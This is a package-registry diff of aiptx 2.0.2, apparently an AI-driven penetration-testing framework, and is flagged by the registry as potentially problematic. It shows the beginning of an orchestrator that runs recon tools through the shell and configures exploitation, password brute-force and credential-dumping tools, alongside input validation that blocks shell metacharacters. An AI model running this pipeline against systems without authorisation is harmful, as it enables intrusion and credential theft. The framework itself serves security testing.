aiptx 2.0.2__py3-none-any.whl
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of aiptx might be problematic; see the package advisory for more details.
- aipt_v2/__init__.py +110 -0
- aipt_v2/__main__.py +24 -0
- aipt_v2/agents/AIPTxAgent/__init__.py +10 -0
- aipt_v2/agents/AIPTxAgent/aiptx_agent.py +211 -0
- aipt_v2/agents/__init__.py +24 -0
- aipt_v2/agents/base.py +520 -0
- aipt_v2/agents/ptt.py +406 -0
- aipt_v2/agents/state.py +168 -0
- aipt_v2/app.py +960 -0
- aipt_v2/browser/__init__.py +31 -0
- aipt_v2/browser/automation.py +458 -0
- aipt_v2/browser/crawler.py +453 -0
- aipt_v2/cli.py +321 -0
- aipt_v2/compliance/__init__.py +71 -0
- aipt_v2/compliance/compliance_report.py +449 -0
- aipt_v2/compliance/framework_mapper.py +424 -0
- aipt_v2/compliance/nist_mapping.py +345 -0
- aipt_v2/compliance/owasp_mapping.py +330 -0
- aipt_v2/compliance/pci_mapping.py +297 -0
- aipt_v2/config.py +288 -0
- aipt_v2/core/__init__.py +43 -0
- aipt_v2/core/agent.py +630 -0
- aipt_v2/core/llm.py +395 -0
- aipt_v2/core/memory.py +305 -0
- aipt_v2/core/ptt.py +329 -0
- aipt_v2/database/__init__.py +14 -0
- aipt_v2/database/models.py +232 -0
- aipt_v2/database/repository.py +384 -0
- aipt_v2/docker/__init__.py +23 -0
- aipt_v2/docker/builder.py +260 -0
- aipt_v2/docker/manager.py +222 -0
- aipt_v2/docker/sandbox.py +371 -0
- aipt_v2/evasion/__init__.py +58 -0
- aipt_v2/evasion/request_obfuscator.py +272 -0
- aipt_v2/evasion/tls_fingerprint.py +285 -0
- aipt_v2/evasion/ua_rotator.py +301 -0
- aipt_v2/evasion/waf_bypass.py +439 -0
- aipt_v2/execution/__init__.py +23 -0
- aipt_v2/execution/executor.py +302 -0
- aipt_v2/execution/parser.py +544 -0
- aipt_v2/execution/terminal.py +337 -0
- aipt_v2/health.py +437 -0
- aipt_v2/intelligence/__init__.py +85 -0
- aipt_v2/intelligence/auth.py +520 -0
- aipt_v2/intelligence/chaining.py +775 -0
- aipt_v2/intelligence/cve_aipt.py +334 -0
- aipt_v2/intelligence/cve_info.py +1111 -0
- aipt_v2/intelligence/rag.py +239 -0
- aipt_v2/intelligence/scope.py +442 -0
- aipt_v2/intelligence/searchers/__init__.py +5 -0
- aipt_v2/intelligence/searchers/exploitdb_searcher.py +523 -0
- aipt_v2/intelligence/searchers/github_searcher.py +467 -0
- aipt_v2/intelligence/searchers/google_searcher.py +281 -0
- aipt_v2/intelligence/tools.json +443 -0
- aipt_v2/intelligence/triage.py +670 -0
- aipt_v2/interface/__init__.py +5 -0
- aipt_v2/interface/cli.py +230 -0
- aipt_v2/interface/main.py +501 -0
- aipt_v2/interface/tui.py +1276 -0
- aipt_v2/interface/utils.py +583 -0
- aipt_v2/llm/__init__.py +39 -0
- aipt_v2/llm/config.py +26 -0
- aipt_v2/llm/llm.py +514 -0
- aipt_v2/llm/memory.py +214 -0
- aipt_v2/llm/request_queue.py +89 -0
- aipt_v2/llm/utils.py +89 -0
- aipt_v2/models/__init__.py +15 -0
- aipt_v2/models/findings.py +295 -0
- aipt_v2/models/phase_result.py +224 -0
- aipt_v2/models/scan_config.py +207 -0
- aipt_v2/monitoring/grafana/dashboards/aipt-dashboard.json +355 -0
- aipt_v2/monitoring/grafana/dashboards/default.yml +17 -0
- aipt_v2/monitoring/grafana/datasources/prometheus.yml +17 -0
- aipt_v2/monitoring/prometheus.yml +60 -0
- aipt_v2/orchestration/__init__.py +52 -0
- aipt_v2/orchestration/pipeline.py +398 -0
- aipt_v2/orchestration/progress.py +300 -0
- aipt_v2/orchestration/scheduler.py +296 -0
- aipt_v2/orchestrator.py +2284 -0
- aipt_v2/payloads/__init__.py +27 -0
- aipt_v2/payloads/cmdi.py +150 -0
- aipt_v2/payloads/sqli.py +263 -0
- aipt_v2/payloads/ssrf.py +204 -0
- aipt_v2/payloads/templates.py +222 -0
- aipt_v2/payloads/traversal.py +166 -0
- aipt_v2/payloads/xss.py +204 -0
- aipt_v2/prompts/__init__.py +60 -0
- aipt_v2/proxy/__init__.py +29 -0
- aipt_v2/proxy/history.py +352 -0
- aipt_v2/proxy/interceptor.py +452 -0
- aipt_v2/recon/__init__.py +44 -0
- aipt_v2/recon/dns.py +241 -0
- aipt_v2/recon/osint.py +367 -0
- aipt_v2/recon/subdomain.py +372 -0
- aipt_v2/recon/tech_detect.py +311 -0
- aipt_v2/reports/__init__.py +17 -0
- aipt_v2/reports/generator.py +313 -0
- aipt_v2/reports/html_report.py +378 -0
- aipt_v2/runtime/__init__.py +44 -0
- aipt_v2/runtime/base.py +30 -0
- aipt_v2/runtime/docker.py +401 -0
- aipt_v2/runtime/local.py +346 -0
- aipt_v2/runtime/tool_server.py +205 -0
- aipt_v2/scanners/__init__.py +28 -0
- aipt_v2/scanners/base.py +273 -0
- aipt_v2/scanners/nikto.py +244 -0
- aipt_v2/scanners/nmap.py +402 -0
- aipt_v2/scanners/nuclei.py +273 -0
- aipt_v2/scanners/web.py +454 -0
- aipt_v2/scripts/security_audit.py +366 -0
- aipt_v2/telemetry/__init__.py +7 -0
- aipt_v2/telemetry/tracer.py +347 -0
- aipt_v2/terminal/__init__.py +28 -0
- aipt_v2/terminal/executor.py +400 -0
- aipt_v2/terminal/sandbox.py +350 -0
- aipt_v2/tools/__init__.py +44 -0
- aipt_v2/tools/active_directory/__init__.py +78 -0
- aipt_v2/tools/active_directory/ad_config.py +238 -0
- aipt_v2/tools/active_directory/bloodhound_wrapper.py +447 -0
- aipt_v2/tools/active_directory/kerberos_attacks.py +430 -0
- aipt_v2/tools/active_directory/ldap_enum.py +533 -0
- aipt_v2/tools/active_directory/smb_attacks.py +505 -0
- aipt_v2/tools/agents_graph/__init__.py +19 -0
- aipt_v2/tools/agents_graph/agents_graph_actions.py +69 -0
- aipt_v2/tools/api_security/__init__.py +76 -0
- aipt_v2/tools/api_security/api_discovery.py +608 -0
- aipt_v2/tools/api_security/graphql_scanner.py +622 -0
- aipt_v2/tools/api_security/jwt_analyzer.py +577 -0
- aipt_v2/tools/api_security/openapi_fuzzer.py +761 -0
- aipt_v2/tools/browser/__init__.py +5 -0
- aipt_v2/tools/browser/browser_actions.py +238 -0
- aipt_v2/tools/browser/browser_instance.py +535 -0
- aipt_v2/tools/browser/tab_manager.py +344 -0
- aipt_v2/tools/cloud/__init__.py +70 -0
- aipt_v2/tools/cloud/cloud_config.py +273 -0
- aipt_v2/tools/cloud/cloud_scanner.py +639 -0
- aipt_v2/tools/cloud/prowler_tool.py +571 -0
- aipt_v2/tools/cloud/scoutsuite_tool.py +359 -0
- aipt_v2/tools/executor.py +307 -0
- aipt_v2/tools/parser.py +408 -0
- aipt_v2/tools/proxy/__init__.py +5 -0
- aipt_v2/tools/proxy/proxy_actions.py +103 -0
- aipt_v2/tools/proxy/proxy_manager.py +789 -0
- aipt_v2/tools/registry.py +196 -0
- aipt_v2/tools/scanners/__init__.py +343 -0
- aipt_v2/tools/scanners/acunetix_tool.py +712 -0
- aipt_v2/tools/scanners/burp_tool.py +631 -0
- aipt_v2/tools/scanners/config.py +156 -0
- aipt_v2/tools/scanners/nessus_tool.py +588 -0
- aipt_v2/tools/scanners/zap_tool.py +612 -0
- aipt_v2/tools/terminal/__init__.py +5 -0
- aipt_v2/tools/terminal/terminal_actions.py +37 -0
- aipt_v2/tools/terminal/terminal_manager.py +153 -0
- aipt_v2/tools/terminal/terminal_session.py +449 -0
- aipt_v2/tools/tool_processing.py +108 -0
- aipt_v2/utils/__init__.py +17 -0
- aipt_v2/utils/logging.py +201 -0
- aipt_v2/utils/model_manager.py +187 -0
- aipt_v2/utils/searchers/__init__.py +269 -0
- aiptx-2.0.2.dist-info/METADATA +324 -0
- aiptx-2.0.2.dist-info/RECORD +165 -0
- aiptx-2.0.2.dist-info/WHEEL +5 -0
- aiptx-2.0.2.dist-info/entry_points.txt +7 -0
- aiptx-2.0.2.dist-info/licenses/LICENSE +21 -0
- aiptx-2.0.2.dist-info/top_level.txt +1 -0
aipt_v2/orchestrator.py
ADDED
|
@@ -0,0 +1,2284 @@
|
|
|
1
|
+
#!/usr/bin/env python3
|
|
2
|
+
"""
|
|
3
|
+
AIPT Orchestrator - Full Penetration Testing Pipeline
|
|
4
|
+
=====================================================
|
|
5
|
+
|
|
6
|
+
Orchestrates the complete pentest workflow:
|
|
7
|
+
RECON → SCAN → EXPLOIT → REPORT
|
|
8
|
+
|
|
9
|
+
Each phase uses specialized tools and integrates with enterprise scanners
|
|
10
|
+
(Acunetix, Burp Suite) for comprehensive coverage.
|
|
11
|
+
|
|
12
|
+
Usage:
|
|
13
|
+
from orchestrator import Orchestrator
|
|
14
|
+
|
|
15
|
+
orch = Orchestrator("example.com")
|
|
16
|
+
results = await orch.run()
|
|
17
|
+
|
|
18
|
+
Or via CLI:
|
|
19
|
+
python -m aipt_v2.orchestrator example.com --output ./results
|
|
20
|
+
"""
|
|
21
|
+
|
|
22
|
+
import asyncio
|
|
23
|
+
import json
|
|
24
|
+
import logging
|
|
25
|
+
import os
|
|
26
|
+
import re
|
|
27
|
+
import shlex
|
|
28
|
+
import subprocess
|
|
29
|
+
import time
|
|
30
|
+
from dataclasses import dataclass, field
|
|
31
|
+
from datetime import datetime, timezone
|
|
32
|
+
from enum import Enum
|
|
33
|
+
from pathlib import Path
|
|
34
|
+
from typing import Any, Callable, Dict, List, Optional
|
|
35
|
+
|
|
36
|
+
# Scanner integrations
|
|
37
|
+
from aipt_v2.tools.scanners import (
|
|
38
|
+
AcunetixTool,
|
|
39
|
+
AcunetixConfig,
|
|
40
|
+
ScanProfile,
|
|
41
|
+
BurpTool,
|
|
42
|
+
BurpConfig,
|
|
43
|
+
get_acunetix,
|
|
44
|
+
get_burp,
|
|
45
|
+
acunetix_scan,
|
|
46
|
+
acunetix_vulns,
|
|
47
|
+
test_all_connections,
|
|
48
|
+
)
|
|
49
|
+
|
|
50
|
+
# Intelligence module - Advanced analysis capabilities
|
|
51
|
+
from aipt_v2.intelligence import (
|
|
52
|
+
# Vulnerability Chaining - Connect related findings into attack paths
|
|
53
|
+
VulnerabilityChainer,
|
|
54
|
+
AttackChain,
|
|
55
|
+
# AI-Powered Triage - Prioritize by real-world impact
|
|
56
|
+
AITriage,
|
|
57
|
+
TriageResult,
|
|
58
|
+
# Scope Enforcement - Stay within authorization
|
|
59
|
+
ScopeEnforcer,
|
|
60
|
+
ScopeConfig,
|
|
61
|
+
ScopeDecision,
|
|
62
|
+
create_scope_from_target,
|
|
63
|
+
# Authentication - Test protected resources
|
|
64
|
+
AuthenticationManager,
|
|
65
|
+
AuthCredentials,
|
|
66
|
+
AuthMethod,
|
|
67
|
+
)
|
|
68
|
+
|
|
69
|
+
logger = logging.getLogger(__name__)
|
|
70
|
+
|
|
71
|
+
|
|
72
|
+
# ==================== SECURITY: Input Validation ====================

# Domain validation pattern (RFC 1123 compliant).
# Allows: alphanumeric, hyphens (not at start/end), dots for subdomains.
# Note: requires a TLD of at least 2 alpha chars, so bare hostnames like
# "localhost" are rejected by design.
DOMAIN_PATTERN = re.compile(
    r'^(?!-)'                              # Cannot start with hyphen
    r'(?:[a-zA-Z0-9]'                      # Start with alphanumeric
    r'(?:[a-zA-Z0-9-]{0,61}[a-zA-Z0-9])?'  # Middle can have hyphens
    r'\.)*'                                # Subdomains separated by dots
    r'[a-zA-Z0-9]'                         # Domain start
    r'(?:[a-zA-Z0-9-]{0,61}[a-zA-Z0-9])?'  # Domain middle
    r'\.[a-zA-Z]{2,}$'                     # TLD (at least 2 chars)
)

# IP address pattern (IPv4, dotted-quad with each octet 0-255)
IPV4_PATTERN = re.compile(
    r'^(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}'
    r'(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)$'
)

# Characters that are dangerous in shell commands; used as a fast
# pre-filter in validate_domain before the regex checks run.
SHELL_DANGEROUS_CHARS = set(';|&$`\n\r\\\'\"(){}[]<>!')
|
|
94
|
+
|
|
95
|
+
|
|
96
|
+
def validate_domain(domain: str) -> str:
    """
    Validate domain format to prevent command injection (CWE-78).

    Args:
        domain: Domain string to validate

    Returns:
        Validated (stripped, lower-cased) domain string

    Raises:
        ValueError: If domain format is invalid or contains dangerous characters
    """
    if not domain:
        raise ValueError("Domain cannot be empty")

    cleaned = domain.strip().lower()

    # RFC 1035 caps a full domain name at 253 characters.
    if len(cleaned) > 253:
        raise ValueError(f"Domain too long: {len(cleaned)} chars (max 253)")

    # Fast rejection of shell metacharacters before any pattern matching.
    bad_chars = set(cleaned) & SHELL_DANGEROUS_CHARS
    if bad_chars:
        raise ValueError(
            f"Domain contains dangerous characters: {bad_chars}. "
            "Possible command injection attempt."
        )

    # Accept either a literal IPv4 address or an RFC 1123-style hostname.
    if IPV4_PATTERN.match(cleaned) or DOMAIN_PATTERN.match(cleaned):
        return cleaned

    raise ValueError(
        f"Invalid domain format: {cleaned}. "
        "Expected format: example.com or sub.example.com"
    )
|
|
137
|
+
|
|
138
|
+
|
|
139
|
+
def sanitize_for_shell(value: str) -> str:
    """
    Sanitize a value for safe use in shell commands using shlex.quote.

    Args:
        value: String to sanitize

    Returns:
        Shell-escaped string safe for command interpolation
    """
    quoted = shlex.quote(value)
    return quoted
|
|
150
|
+
|
|
151
|
+
|
|
152
|
+
class Phase(Enum):
    """Pentest phases, in pipeline order: RECON → SCAN → ANALYZE → EXPLOIT → POST_EXPLOIT → REPORT."""
    RECON = "recon"
    SCAN = "scan"
    ANALYZE = "analyze"  # Intelligence analysis (chaining, triage)
    EXPLOIT = "exploit"
    POST_EXPLOIT = "post_exploit"  # Privilege escalation & lateral movement
    REPORT = "report"
|
|
160
|
+
|
|
161
|
+
|
|
162
|
+
class Severity(Enum):
    """Finding severity levels, ordered from most to least severe.

    NOTE(review): Finding.severity is a plain str elsewhere in this file;
    these enum values define the canonical vocabulary for it.
    """
    CRITICAL = "critical"
    HIGH = "high"
    MEDIUM = "medium"
    LOW = "low"
    INFO = "info"
|
|
169
|
+
|
|
170
|
+
|
|
171
|
+
@dataclass
class Finding:
    """Security finding from any tool.

    A normalized record so that output from every phase/tool can be
    aggregated, analyzed and reported uniformly.
    """
    type: str          # Finding category, e.g. "open_port", "waf_detected"
    value: str         # Primary value (port, WAF name, count, template id, ...)
    description: str   # Human-readable summary
    severity: str      # One of the Severity enum values ("critical" .. "info")
    phase: str         # Phase that produced it ("recon", "scan", ...)
    tool: str          # Tool that produced it (e.g. "nmap", "nuclei")
    target: str = ""       # Host/URL the finding applies to
    evidence: str = ""     # Raw supporting output, if captured
    remediation: str = ""  # Suggested fix, if known
    metadata: Dict[str, Any] = field(default_factory=dict)  # Tool-specific extras
    # UTC creation time in ISO-8601 form, captured when the Finding is built.
    timestamp: str = field(default_factory=lambda: datetime.now(timezone.utc).isoformat())
|
|
185
|
+
|
|
186
|
+
|
|
187
|
+
@dataclass
class PhaseResult:
    """Result of a phase execution, recorded in Orchestrator.phase_results."""
    phase: Phase          # Which pipeline phase this summarizes
    status: str           # e.g. "completed"
    started_at: str       # UTC ISO-8601 start timestamp
    finished_at: str      # UTC ISO-8601 end timestamp
    duration: float       # Wall-clock seconds
    findings: List[Finding]   # Findings produced during this phase
    tools_run: List[str]      # Names of tools that ran successfully
    errors: List[str] = field(default_factory=list)        # Non-fatal errors encountered
    metadata: Dict[str, Any] = field(default_factory=dict) # Phase-specific counters/extras
|
|
199
|
+
|
|
200
|
+
|
|
201
|
+
@dataclass
class OrchestratorConfig:
    """Configuration for the orchestrator.

    Groups every knob for target selection, phase control, tool lists,
    enterprise scanner integration and reporting. Defaults give a
    non-exploiting scan (exploitation requires explicit opt-in).
    """
    # Target
    target: str
    output_dir: str = "./scan_results"

    # Scan mode
    full_mode: bool = False  # Enable all tools including exploitation

    # Phase control
    skip_recon: bool = False
    skip_scan: bool = False
    skip_exploit: bool = False
    skip_post_exploit: bool = True  # Disabled by default, auto-enables on shell access
    skip_report: bool = False

    # Recon settings - ENHANCED with 10 tools
    recon_tools: List[str] = field(default_factory=lambda: [
        "subfinder", "assetfinder", "amass", "httpx", "nmap",
        "waybackurls", "theHarvester", "dnsrecon", "wafw00f", "whatweb"
    ])

    # Scan settings - ENHANCED with 8 tools
    scan_tools: List[str] = field(default_factory=lambda: [
        "nuclei", "ffuf", "sslscan", "nikto", "wpscan",
        "testssl", "gobuster", "dirsearch"
    ])

    # Exploit settings - NEW exploitation tools (enabled in full_mode)
    exploit_tools: List[str] = field(default_factory=lambda: [
        "sqlmap", "commix", "xsstrike", "hydra", "searchsploit"
    ])

    # Post-exploit settings - NEW privilege escalation tools
    post_exploit_tools: List[str] = field(default_factory=lambda: [
        "linpeas", "winpeas", "pspy", "lazagne"
    ])

    # Enterprise scanners
    use_acunetix: bool = True
    use_burp: bool = False
    use_nessus: bool = False  # NEW
    use_zap: bool = False  # NEW
    acunetix_profile: str = "full"
    wait_for_scanners: bool = False  # Block until enterprise scans finish
    scanner_timeout: int = 3600      # Seconds to wait for enterprise scanners

    # Exploit settings
    validate_findings: bool = True
    check_sensitive_paths: bool = True
    enable_exploitation: bool = False  # Requires explicit opt-in or full_mode

    # SQLMap settings
    sqlmap_level: int = 2
    sqlmap_risk: int = 2
    sqlmap_timeout: int = 600  # seconds

    # Hydra settings
    hydra_threads: int = 4
    hydra_timeout: int = 300  # seconds
    wordlist_users: str = "/usr/share/wordlists/metasploit/unix_users.txt"
    wordlist_passwords: str = "/usr/share/wordlists/rockyou.txt"

    # Container/DevSecOps settings
    enable_container_scan: bool = False
    enable_secret_detection: bool = False
    trivy_severity: str = "HIGH,CRITICAL"

    # Report settings
    report_format: str = "html"
    report_template: str = "professional"

    # Shell access tracking (set during exploitation)
    shell_obtained: bool = False
    target_os: str = ""  # "linux", "windows", or ""

    # Intelligence module settings
    enable_intelligence: bool = True  # Enable chaining and triage
    scope_config: Optional[ScopeConfig] = None  # Authorization boundary
    auth_credentials: Optional[AuthCredentials] = None  # Authentication for protected resources
|
|
282
|
+
|
|
283
|
+
|
|
284
|
+
class Orchestrator:
|
|
285
|
+
"""
|
|
286
|
+
AIPT Orchestrator - Full pentest pipeline controller.
|
|
287
|
+
|
|
288
|
+
Coordinates reconnaissance, scanning, exploitation, and reporting
|
|
289
|
+
phases with integrated support for enterprise scanners.
|
|
290
|
+
"""
|
|
291
|
+
|
|
292
|
+
def __init__(self, target: str, config: Optional[OrchestratorConfig] = None):
    """
    Initialize the orchestrator.

    Args:
        target: Target domain or URL
        config: Optional configuration

    Raises:
        ValueError: If the domain extracted from ``target`` fails
            validation (propagated from validate_domain).

    Side effects:
        Creates a timestamped output directory under config.output_dir.
        NOTE(review): if a config object is passed in, its ``target``
        field is overwritten with the normalized target (caller's
        object is mutated).
    """
    self.target = self._normalize_target(target)
    self.domain = self._extract_domain(target)
    self.config = config or OrchestratorConfig(target=target)
    self.config.target = self.target

    # State accumulated across phases
    self.findings: List[Finding] = []
    self.phase_results: Dict[Phase, PhaseResult] = {}
    self.subdomains: List[str] = []
    self.live_hosts: List[str] = []
    self.scan_ids: Dict[str, str] = {}  # Scanner -> scan_id mapping

    # Setup output directory (local-time timestamp used for the dir name)
    self.timestamp = datetime.now().strftime("%Y-%m-%d_%H-%M-%S")
    self.output_dir = Path(self.config.output_dir) / f"{self.domain}_scan_{self.timestamp}"
    self.output_dir.mkdir(parents=True, exist_ok=True)

    # Callbacks (all optional; invoked synchronously when set)
    self.on_phase_start: Optional[Callable[[Phase], None]] = None
    self.on_phase_complete: Optional[Callable[[PhaseResult], None]] = None
    self.on_finding: Optional[Callable[[Finding], None]] = None
    self.on_tool_start: Optional[Callable[[str, str], None]] = None
    self.on_tool_complete: Optional[Callable[[str, str, Any], None]] = None
    self.on_chain_discovered: Optional[Callable[[AttackChain], None]] = None

    # =====================================================================
    # Intelligence Module Components
    # =====================================================================
    if self.config.enable_intelligence:
        # Scope Enforcement - Ensure testing stays within authorization.
        # An explicit scope_config wins; otherwise a scope is derived
        # from the target itself.
        if self.config.scope_config:
            self._scope_enforcer = ScopeEnforcer(self.config.scope_config)
            issues = self._scope_enforcer.validate_scope_config()
            for issue in issues:
                logger.warning(f"Scope config: {issue}")
        else:
            self._scope_enforcer = ScopeEnforcer(create_scope_from_target(self.target))

        # Vulnerability Chainer - Connect related findings
        self._vuln_chainer = VulnerabilityChainer()

        # AI Triage - Prioritize findings by real-world impact
        self._ai_triage = AITriage()

        # Authentication Manager - only built when real credentials exist
        self._auth_manager: Optional[AuthenticationManager] = None
        if self.config.auth_credentials and self.config.auth_credentials.method != AuthMethod.NONE:
            self._auth_manager = AuthenticationManager(self.config.auth_credentials)
            logger.info(f"Authentication configured: {self.config.auth_credentials.method.value}")

        # Analysis results storage
        self.attack_chains: List[AttackChain] = []
        self.triage_result: Optional[TriageResult] = None
    else:
        # Intelligence disabled: keep the same attribute surface with
        # None/empty placeholders so later code can test them safely.
        self._scope_enforcer = None
        self._vuln_chainer = None
        self._ai_triage = None
        self._auth_manager = None
        self.attack_chains = []
        self.triage_result = None

    logger.info(f"Orchestrator initialized for {self.domain}")
    logger.info(f"Output directory: {self.output_dir}")
    if self.config.enable_intelligence:
        logger.info("Intelligence module enabled (chaining, triage, scope)")
|
|
365
|
+
|
|
366
|
+
@staticmethod
|
|
367
|
+
def _normalize_target(target: str) -> str:
|
|
368
|
+
"""Normalize target URL."""
|
|
369
|
+
if not target.startswith(("http://", "https://")):
|
|
370
|
+
return f"https://{target}"
|
|
371
|
+
return target
|
|
372
|
+
|
|
373
|
+
@staticmethod
def _extract_domain(target: str) -> str:
    """
    Extract and validate domain from target.

    Strips any http/https scheme, then drops path and port components
    before validating.

    Security: Validates domain format to prevent command injection (CWE-78).

    Raises:
        ValueError: propagated from validate_domain on bad input.
    """
    stripped = target.replace("https://", "").replace("http://", "")
    host = stripped.split("/")[0].split(":")[0]
    # Security: Validate domain format
    return validate_domain(host)
|
|
386
|
+
|
|
387
|
+
@property
def safe_domain(self) -> str:
    """
    Get shell-safe domain for command interpolation.

    self.domain has already passed validate_domain; this adds
    shlex-quoting as defense in depth before the value is embedded
    in shell command strings.

    Returns:
        Shell-escaped domain string
    """
    return sanitize_for_shell(self.domain)
|
|
396
|
+
|
|
397
|
+
def _log_phase(self, phase: Phase, message: str):
    """Print a banner announcing a phase transition to stdout."""
    banner = "=" * 60
    print(f"\n{banner}")
    print(f" [{phase.value.upper()}] {message}")
    print(f"{banner}\n")
|
|
402
|
+
|
|
403
|
+
def _log_tool(self, tool: str, status: str = "running"):
    """Print a one-line status marker for a tool run.

    "running" → ◉, "done" → ✓, anything else → ✗.
    """
    icons = {"running": "◉", "done": "✓"}
    icon = icons.get(status, "✗")
    print(f" [{icon}] {tool}")
|
|
407
|
+
|
|
408
|
+
async def _run_command(self, cmd: str, timeout: int = 300) -> tuple[int, str]:
|
|
409
|
+
"""Run a shell command asynchronously."""
|
|
410
|
+
try:
|
|
411
|
+
proc = await asyncio.create_subprocess_shell(
|
|
412
|
+
cmd,
|
|
413
|
+
stdout=asyncio.subprocess.PIPE,
|
|
414
|
+
stderr=asyncio.subprocess.PIPE
|
|
415
|
+
)
|
|
416
|
+
stdout, stderr = await asyncio.wait_for(
|
|
417
|
+
proc.communicate(),
|
|
418
|
+
timeout=timeout
|
|
419
|
+
)
|
|
420
|
+
output = (stdout.decode() if stdout else "") + (stderr.decode() if stderr else "")
|
|
421
|
+
return proc.returncode or 0, output
|
|
422
|
+
except asyncio.TimeoutError:
|
|
423
|
+
return -1, f"Command timed out after {timeout}s"
|
|
424
|
+
except Exception as e:
|
|
425
|
+
return -1, str(e)
|
|
426
|
+
|
|
427
|
+
def _add_finding(self, finding: Finding):
|
|
428
|
+
"""Add a finding and trigger callback."""
|
|
429
|
+
self.findings.append(finding)
|
|
430
|
+
if self.on_finding:
|
|
431
|
+
self.on_finding(finding)
|
|
432
|
+
|
|
433
|
+
# ==================== RECON PHASE ====================
|
|
434
|
+
|
|
435
|
+
async def run_recon(self) -> PhaseResult:
    """
    Execute reconnaissance phase.

    Runs the configured recon tools (subdomain enumeration, live-host
    probing, port scanning, OSINT, DNS, WAF and tech fingerprinting),
    saves raw tool output under self.output_dir, and records notable
    results as Finding objects.

    Security fixes vs. previous revision:
      * httpx now reads subdomains from the on-disk list file instead of
        interpolating tool-returned names into an echo '<...>' string —
        a subdomain containing a quote could break out of the quoting
        and inject shell commands (CWE-78).
      * self.target (which, unlike self.domain, is not validated) is
        shlex-quoted before being embedded in wafw00f/whatweb commands.
      * Output-file paths passed to dnsrecon/whatweb are shlex-quoted.

    Returns:
        PhaseResult summarizing tools run, findings, and errors.
    """
    phase = Phase.RECON
    started_at = datetime.now(timezone.utc).isoformat()
    start_time = time.time()
    findings: List[Finding] = []
    tools_run: List[str] = []
    errors: List[str] = []

    if self.on_phase_start:
        self.on_phase_start(phase)

    self._log_phase(phase, f"Reconnaissance on {self.domain}")

    # 1. Subdomain Enumeration
    self._log_tool("Subdomain Enumeration")

    # Subfinder
    if "subfinder" in self.config.recon_tools:
        self._log_tool("subfinder", "running")
        # Security: Use safe_domain to prevent command injection
        ret, output = await self._run_command(
            f"subfinder -d {self.safe_domain} -silent 2>/dev/null"
        )
        if ret == 0:
            subs = [s.strip() for s in output.split("\n") if s.strip()]
            self.subdomains.extend(subs)
            (self.output_dir / f"subfinder_{self.domain}.txt").write_text(output)
            tools_run.append("subfinder")
            self._log_tool(f"subfinder - {len(subs)} subdomains", "done")

    # Assetfinder
    if "assetfinder" in self.config.recon_tools:
        self._log_tool("assetfinder", "running")
        # Security: Use safe_domain to prevent command injection
        ret, output = await self._run_command(
            f"assetfinder --subs-only {self.safe_domain} 2>/dev/null"
        )
        if ret == 0:
            subs = [s.strip() for s in output.split("\n") if s.strip()]
            self.subdomains.extend(subs)
            (self.output_dir / f"assetfinder_{self.domain}.txt").write_text(output)
            tools_run.append("assetfinder")
            self._log_tool(f"assetfinder - {len(subs)} assets", "done")

    # Deduplicate subdomains and persist the combined list
    self.subdomains = list(set(self.subdomains))
    all_subs_file = self.output_dir / f"all_subs_{self.domain}.txt"
    all_subs_file.write_text("\n".join(self.subdomains))

    findings.append(Finding(
        type="subdomain_count",
        value=str(len(self.subdomains)),
        description=f"Discovered {len(self.subdomains)} unique subdomains",
        severity="info",
        phase="recon",
        tool="subdomain_enum",
        target=self.domain
    ))

    # 2. Live Host Detection with HTTPX
    if "httpx" in self.config.recon_tools and self.subdomains:
        self._log_tool("httpx", "running")
        # Security fix (CWE-78): feed httpx from the already-written file
        # via -l instead of echoing tool-controlled subdomain names into
        # a single-quoted shell string.
        safe_subs_file = sanitize_for_shell(str(all_subs_file))
        ret, output = await self._run_command(
            f"httpx -l {safe_subs_file} -silent -status-code -title -tech-detect -json 2>/dev/null",
            timeout=180
        )
        if ret == 0:
            httpx_file = self.output_dir / "httpx_results.json"
            httpx_file.write_text(output)

            # Parse live hosts (httpx emits one JSON object per line)
            for line in output.split("\n"):
                if line.strip():
                    try:
                        data = json.loads(line)
                        url = data.get("url", "")
                        if url:
                            self.live_hosts.append(url)
                    except json.JSONDecodeError:
                        continue

            tools_run.append("httpx")
            self._log_tool(f"httpx - {len(self.live_hosts)} live hosts", "done")

            findings.append(Finding(
                type="live_hosts",
                value=str(len(self.live_hosts)),
                description=f"Found {len(self.live_hosts)} live hosts",
                severity="info",
                phase="recon",
                tool="httpx",
                target=self.domain
            ))

    # 3. Port Scanning with Nmap
    if "nmap" in self.config.recon_tools:
        self._log_tool("nmap", "running")
        # Security: Use safe_domain to prevent command injection
        ret, output = await self._run_command(
            f"nmap -sV --top-ports 100 {self.safe_domain} 2>/dev/null",
            timeout=300
        )
        if ret == 0:
            (self.output_dir / f"nmap_{self.domain}.txt").write_text(output)
            tools_run.append("nmap")

            # Parse open ports from lines like "80/tcp open http"
            for line in output.split("\n"):
                if "/tcp" in line and "open" in line:
                    parts = line.split()
                    if len(parts) >= 3:
                        port = parts[0]
                        service = parts[2] if len(parts) > 2 else "unknown"
                        findings.append(Finding(
                            type="open_port",
                            value=port,
                            description=f"Port {port} open running {service}",
                            severity="info",
                            phase="recon",
                            tool="nmap",
                            target=self.domain
                        ))

            self._log_tool("nmap - completed", "done")

    # 4. Wayback URLs (capped at 5000 to bound memory/disk use)
    if "waybackurls" in self.config.recon_tools:
        self._log_tool("waybackurls", "running")
        # Security: Use safe_domain to prevent command injection
        ret, output = await self._run_command(
            f"echo {self.safe_domain} | waybackurls 2>/dev/null | head -5000"
        )
        if ret == 0:
            (self.output_dir / f"wayback_{self.domain}.txt").write_text(output)
            url_count = len([u for u in output.split("\n") if u.strip()])
            tools_run.append("waybackurls")
            self._log_tool(f"waybackurls - {url_count} URLs", "done")

    # 5. Amass - Advanced Subdomain Enumeration
    if "amass" in self.config.recon_tools:
        self._log_tool("amass", "running")
        ret, output = await self._run_command(
            f"amass enum -passive -d {self.safe_domain} -timeout 5 2>/dev/null",
            timeout=360
        )
        if ret == 0:
            subs = [s.strip() for s in output.split("\n") if s.strip()]
            self.subdomains.extend(subs)
            (self.output_dir / f"amass_{self.domain}.txt").write_text(output)
            tools_run.append("amass")
            self._log_tool(f"amass - {len(subs)} subdomains", "done")

    # 6. theHarvester - OSINT Email & Subdomain Gathering
    if "theHarvester" in self.config.recon_tools:
        self._log_tool("theHarvester", "running")
        ret, output = await self._run_command(
            f"theHarvester -d {self.safe_domain} -b all -l 100 2>/dev/null",
            timeout=300
        )
